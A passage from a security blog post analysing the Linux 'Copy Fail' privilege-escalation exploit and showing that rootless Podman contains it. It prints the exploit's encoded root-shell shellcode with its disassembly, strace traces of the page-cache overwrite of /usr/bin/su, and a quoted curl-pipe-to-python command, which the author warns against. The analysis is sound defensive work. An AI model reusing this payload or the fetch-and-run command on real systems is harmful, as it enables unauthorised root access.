CVE-2026-31431: Copy Fail vs. rootless containers

D dragonsreach.it ↗

▲ 205 points • 123 comments • by averi • 2mo ago • HN discussion ↗


Table of Contents

Introduction
The vulnerability
Analyzing the shellcode
Setting up the lab
Setting up rootless Podman
Running the exploit inside a container
Tracing the exploit mechanism
Why rootless containers stopped the escalation
Catching the kernel in the act with eBPF
The uid_map proof
Conclusions

Introduction

In the previous post about SELinux MCS and GitLab runners, I briefly mentioned CVE-2026-31431 (“Copy Fail”) as a motivating example for per-job VM isolation. After that post went out I spent the weekend setting up a lab to actually run the exploit, trace it at the syscall level, and verify that the rootless Podman architecture we deploy on GNOME’s runners would contain it. This post documents the entire process, from disassembling the shellcode to watching the kernel reject the privilege escalation in real time.

The vulnerability

For a full technical breakdown of the root cause, the scatterlist mechanics, and the disclosure timeline, read Theori’s excellent writeup at xint.io/blog/copy-fail-linux-distributions. In this post we’ll first analyze the shellcode embedded in the public exploit, then set up a lab to run it inside a rootless container, and finally trace what happens at the kernel level.

Analyzing the shellcode

In the days following the disclosure I noticed a lot of people running the exploit on their systems without bothering to check what the shellcode actually does. Executing a compressed binary blob from a GitHub repository you have never audited is not a great security practice: for all you know it could be exfiltrating data or dropping a backdoor alongside the privilege escalation. So before running anything, let’s look at what the shellcode actually contains.

The shellcode is embedded in the Python exploit as a compressed and hex-encoded string:

78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a
154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56
c3ff593611fcacfa499979fac5190c0c0c0032c310d3

The script uses zlib.decompress() to turn this into raw bytes. To extract and inspect the payload:

#!/usr/bin/env python3
import zlib

hex_str = "78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"

# Decode the hex string, then inflate the zlib stream
compressed_bytes = bytes.fromhex(hex_str)
raw_payload = zlib.decompress(compressed_bytes)

# Write the decompressed payload to disk for inspection
with open("shellcode.bin", "wb") as f:
    f.write(raw_payload)

print(f"Payload extracted: {len(raw_payload)} bytes")

Running file on the extracted binary confirms what we expect:

shellcode.bin: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked...

This is not raw shellcode: it is a fully formed ELF executable. The exploit overwrites the beginning of the page-cache copy of /usr/bin/su with this tiny binary. When the OS executes su, it loads the corrupted pages from the page cache and runs the malicious ELF instead of the legitimate utility.
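To go one step beyond file, the ELF64 header fields can be read directly. The following is a minimal sketch and not part of the original exploit or tooling: parse_elf64_header and the synthetic demo header are hypothetical names and values chosen for illustration, and the field layout is the standard ELF64 file header. On the real shellcode.bin one would pass raw_payload instead of the demo bytes.

```python
import struct

# Standard ELF64 file header layout (little-endian), 64 bytes in total.
ELF64_HEADER = struct.Struct("<16sHHIQQQIHHHHHH")


def parse_elf64_header(data: bytes) -> dict:
    """Return a few ELF64 header fields read from the start of `data`."""
    if len(data) < ELF64_HEADER.size:
        raise ValueError("too short for an ELF64 header")
    (ident, e_type, e_machine, _version, e_entry, e_phoff, e_shoff,
     _flags, e_ehsize, e_phentsize, e_phnum, _shentsize, e_shnum,
     _shstrndx) = ELF64_HEADER.unpack_from(data)
    if ident[:4] != b"\x7fELF":
        raise ValueError("missing ELF magic")
    return {
        "e_type": e_type,
        "e_machine": e_machine,
        "e_entry": e_entry,
        "e_shoff": e_shoff,
        "e_shnum": e_shnum,  # 0 means the section headers were stripped
        # Offset of the first byte after the program header table
        "headers_end": e_phoff + e_phnum * e_phentsize,
    }


# Synthetic header for demonstration only (assumed values, NOT the real payload):
# ET_EXEC, EM_X86_64, one 56-byte program header, no section headers.
demo_ident = b"\x7fELF" + bytes([2, 1, 1]) + bytes(9)
demo_header = ELF64_HEADER.pack(
    demo_ident, 2, 0x3E, 1, 0x400078, 64, 0, 0, 64, 56, 1, 0, 0, 0
)
info = parse_elf64_header(demo_header)
print(info)
```

A header like the synthetic one reports e_shnum as 0, which is the situation where objdump -d finds no sections to disassemble.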


The standard objdump -d shellcode.bin produces no output because the exploit author used a technique called ELF golfing: stripping the section headers to compress the payload down to roughly 160 bytes. Without a .text section, objdump gives up. To force raw disassembly:

objdump -D -b binary -m i386:x86-64 shellcode.bin

The first 0x78 bytes (offsets 0x00 to 0x77) are ELF header data that objdump tries to interpret as assembly, producing nonsensical add %al,(%rax) instructions. The actual code begins at offset 0x78. Here is the full disassembly with annotations:

The setuid(0) syscall (offsets 0x78 to 0x7e):

78: 31 c0    xor %eax,%eax
7a: 31 ff    xor %edi,%edi
7c: b0 69    mov $0x69,%al
7e: 0f 05    syscall

xor %eax, %eax clears rax so that the one-byte mov into %al yields a clean syscall number. xor %edi, %edi sets rdi to 0, the first argument for the syscall. mov $0x69, %al loads 105 (decimal), which is the Linux x86-64 syscall number for setuid. The syscall instruction executes setuid(0).

The execve("/bin/sh") syscall (offsets 0x80 to 0x8d):

80: 48 8d 3d 0f 00 00 00    lea 0xf(%rip),%rdi
87: 31 f6                   xor %esi,%esi
89: 6a 3b                   push $0x3b
8b: 58                      pop %rax
8c: 99                      cltd
8d: 0f 05                   syscall

lea 0xf(%rip), %rdi is a RIP-relative address computation: it adds 15 (0xf) to the address of the next instruction (0x87), which lands exactly at offset 0x96, the start of the /bin/sh string.
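The instruction offsets and the lea target can be checked with a few lines of arithmetic. This is a minimal sketch: the byte sequences are copied from the disassembly, while SETUID_BLOCK, instruction_offsets, and rip_relative_target are hypothetical helper names introduced here for illustration.

```python
# Instruction bytes of the setuid(0) block, copied from the listing.
SETUID_BLOCK = [
    bytes.fromhex("31c0"),  # xor %eax,%eax
    bytes.fromhex("31ff"),  # xor %edi,%edi
    bytes.fromhex("b069"),  # mov $0x69,%al
    bytes.fromhex("0f05"),  # syscall
]

# The lea instruction at offset 0x80: opcode bytes plus a 32-bit displacement.
LEA = bytes.fromhex("488d3d0f000000")


def instruction_offsets(start, instructions):
    """Return the file offset at which each instruction begins."""
    offsets = []
    offset = start
    for ins in instructions:
        offsets.append(offset)
        offset += len(ins)
    return offsets


def rip_relative_target(insn_offset, insn_length, displacement):
    """RIP already points at the next instruction when the displacement is added."""
    return insn_offset + insn_length + displacement


offsets = instruction_offsets(0x78, SETUID_BLOCK)
# The displacement is the little-endian signed 32-bit value in the last 4 bytes.
disp = int.from_bytes(LEA[3:7], "little", signed=True)
target = rip_relative_target(0x80, len(LEA), disp)

print([hex(o) for o in offsets], hex(target))
```

Each two-byte instruction advances the offset by two, and the 7-byte lea puts the next instruction at 0x87, so a displacement of 0xf resolves to 0x96.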


xor %esi, %esi sets argv to NULL. The push $0x3b / pop %rax sequence is a golfing trick to load 59 (execve) in fewer bytes than mov rax, 59. cltd sign-extends eax into edx, zeroing the third argument (envp) with a single byte. The final syscall executes execve("/bin/sh", NULL, NULL).

The clean exit (offsets 0x8f to 0x94):

8f: 31 ff    xor %edi,%edi
91: 6a 3c    push $0x3c
93: 58       pop %rax
94: 0f 05    syscall

If execve somehow fails, the payload calls exit(0) (syscall 60) rather than crashing.

The hardcoded string (offsets 0x96 to 0x9d):

96: 2f                (bad)
97: 62 69 6e 2f 73    (bad)
9c: 68                .byte 0x68
9d: 00 00             add %al,(%rax)

objdump marks these as (bad) because it is trying to decode data as instructions. Converting the hex bytes 2f 62 69 6e 2f 73 68 00 to ASCII yields /bin/sh\0, the null-terminated string that the lea instruction at offset 0x80 points to.

Setting up the lab

To reproduce the vulnerability I provisioned a Fedora 43 VM using virt-install.


The kernel I had installed was 6.17.1-300.fc43.x86_64, which predates the fix entirely: the patch was backported into the stable 6.19.x tree starting with 6.19.12, so the entire 6.17.x line is vulnerable.

virt-install \
  --name cve-2026-31431 \
  --vcpus 4 \
  --memory 4096 \
  --disk path=/var/lib/libvirt/images/cve-2026-31431.qcow2,size=20,bus=virtio,format=qcow2 \
  --network bridge=virbr0,model=virtio \
  --location 'https://download.fedoraproject.org/pub/fedora/linux/releases/43/Everything/x86_64/os/' \
  --initrd-inject=/tmp/vm.ks \
  --extra-args="inst.ks=file:/vm.ks console=ttyS0,115200n8" \
  --graphics none

Setting up rootless Podman

On the Fedora VM, I configured rootless Podman following the same patterns we use on GNOME’s GitLab runners: a dedicated podman system user with linger enabled, pasta for networking (the modern replacement for slirp4netns), and a large Sub-UID/Sub-GID allocation.

dnf install -y podman

useradd -m podman

usermod --add-subuids 100000-165535 --add-subgids 100000-165535 podman

loginctl enable-linger podman

su - podman -c 'podman run --rm alpine echo "Rootless Podman is working!"'

Running the exploit inside a container

Running strace inside a container requires two overrides: --cap-add=SYS_PTRACE (container runtimes drop this capability by default) and --security-opt seccomp=unconfined (the default seccomp profile blocks ptrace). Without both, strace will fail immediately with PTRACE_TRACEME: Operation not permitted.
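Whether the capability actually reached the container can be checked from /proc/self/status. The following is a minimal sketch, assuming the usual Linux format of the CapEff line (a hexadecimal bitmask) and that CAP_SYS_PTRACE is capability number 19. capability_mask, has_capability, and both sample status snippets are hypothetical and for illustration only. This covers the capability half of the requirement; it says nothing about the seccomp profile.

```python
CAP_SYS_PTRACE = 19  # capability number as defined in <linux/capability.h>


def capability_mask(status_text: str, field: str = "CapEff") -> int:
    """Extract a capability bitmask from /proc/<pid>/status-style text."""
    for line in status_text.splitlines():
        name, _, value = line.partition(":")
        if name == field:
            return int(value.strip(), 16)
    raise KeyError(field)


def has_capability(mask: int, cap: int) -> bool:
    """True if bit number `cap` is set in the mask."""
    return bool((mask >> cap) & 1)


# Illustrative sample values (assumed, not captured from the lab):
# the second mask differs from the first only by bit 19.
SAMPLE_DEFAULT = "Name:\tbash\nCapEff:\t00000000800405fb\n"
SAMPLE_WITH_PTRACE = "Name:\tbash\nCapEff:\t00000000800c05fb\n"

for label, text in (("default", SAMPLE_DEFAULT), ("with ptrace", SAMPLE_WITH_PTRACE)):
    mask = capability_mask(text)
    print(label, has_capability(mask, CAP_SYS_PTRACE))
```

Inside a real container the same functions could be fed the contents of /proc/self/status instead of the sample strings.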


I downloaded copy_fail_exp.py into a local directory beforehand; the /vuln mount in the command below points to that directory. Worth noting: I also saw people running the exploit via curl https://copy.fail/exp | python3 && su directly, which is just as reckless as running the shellcode without inspecting it first. Always download, read, and understand what you are about to execute.

From the host VM as the podman user:

podman run --rm -it \
  --cap-add=SYS_PTRACE \
  --security-opt seccomp=unconfined \
  -v $(pwd):/vuln:Z \
  -w /vuln \
  fedora:43 bash

Inside the container, I installed strace, created an unprivileged test user, and ran the exploit:

dnf install -y strace python3 su -y
useradd testuser
chown testuser:testuser copy_fail_exp.py
cp /root/copy_fail_exp.py /home/testuser

su - testuser -c "strace -f -e trace=socket,bind,setsockopt,sendmsg,splice,execve,setuid -o python_trace.txt python3 copy_fail_exp.py"

Tracing the exploit mechanism

The strace output captured the exact mechanism by which the vulnerability corrupts the page cache. The exploit loops over the shellcode payload, writing it four bytes at a time into the in-memory cache of /usr/bin/su:

169 socket(AF_ALG, SOCK_SEQPACKET|SOCK_CLOEXEC, 0) = 4
169 bind(4, {sa_family=AF_ALG, salg_type="aead", salg_feat=0, salg_mask=0, salg_name="authencesn(hmac(sha256),cbc(aes))"}, 88) = 0
169 setsockopt(4, SOL_ALG, ALG_SET_KEY, "\10\0\1\0...", 40) = 0
169 setsockopt(4, SOL_ALG, ALG_SET_AEAD_AUTHSIZE, NULL, 4) = 0
169 sendmsg(5, {msg_iov=[{iov_base="AAAA\177ELF", iov_len=8}]}, MSG_MORE) = 8
169 splice(3, [0], 7, NULL, 4, 0) = 4
169 splice(6, NULL, 5, NULL, 4, 0) = 4

Step by step:

1. The script creates an AF_ALG socket, the kernel’s userspace cryptographic API, available to unprivileged users by default.
2. It binds to authencesn(hmac(sha256),cbc(aes)), the specific cipher whose ESN scratch write triggers the bug.
3. sendmsg delivers an 8-byte message. The first four bytes (AAAA) are padding; the next four (\177ELF) are the data to write, the start of the ELF header. In later iterations, different 4-byte chunks of the shellcode are sent (e.g., iov_base="AAAA1\3001\377").
4. splice() transfers page cache pages of /usr/bin/su into the crypto socket’s buffer without copying to userspace. The kernel’s authencesn scratch write then deposits those four bytes from sendmsg directly into the page cache, bypassing file permissions entirely.

This pattern repeats dozens of times until the entire malicious ELF payload is staged into the page cache. At the end:

170 execve("/usr/sbin/su", ["su"], 0x559f5d7fbe50 /* 22 vars */) = 0
170 execve("/bin/sh", NULL, NULL) = 0

The script executes su, which loads from the corrupted page cache and runs the malicious payload instead of the legitimate binary.

Why rootless containers stopped the escalation

The exploit successfully overwrote /usr/bin/su in the page cache, executed the shellcode, and escalated to root inside the container: the prompt changed to [root@ce307d49e132 testuser]# and setuid(0) returned success. But that root is contained by User Namespace UID mappings.

Rootless Podman relies on Linux User Namespaces.
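To make the idea of a UID mapping concrete, here is a minimal sketch of how an ID inside a user namespace translates to an ID outside it. It assumes the three-column format of /proc/<pid>/uid_map (inside ID, outside ID, range length). The sample mapping is hypothetical: it assumes the podman user has host UID 1000 and uses the sub-UID range 100000-165535 configured earlier. parse_uid_map and map_to_host are illustrative helpers, not a kernel or Podman API.

```python
def parse_uid_map(text):
    """Parse uid_map-style text into (inside, outside, length) tuples."""
    entries = []
    for line in text.splitlines():
        if line.strip():
            inside, outside, length = (int(field) for field in line.split())
            entries.append((inside, outside, length))
    return entries


def map_to_host(uid, entries):
    """Translate a UID inside the namespace to the UID seen outside it."""
    for inside, outside, length in entries:
        if inside <= uid < inside + length:
            return outside + (uid - inside)
    return None  # the UID has no mapping in this namespace


# Hypothetical mapping (assumed values): container root is the unprivileged
# host user, everything else comes from the sub-UID range.
SAMPLE_UID_MAP = (
    "         0       1000          1\n"
    "         1     100000      65536\n"
)

entries = parse_uid_map(SAMPLE_UID_MAP)
for container_uid in (0, 1, 65536):
    print(container_uid, "->", map_to_host(container_uid, entries))
```

Under these assumed values, UID 0 inside the container is simply UID 1000 on the host, which is why a successful setuid(0) in the container does not by itself grant host root.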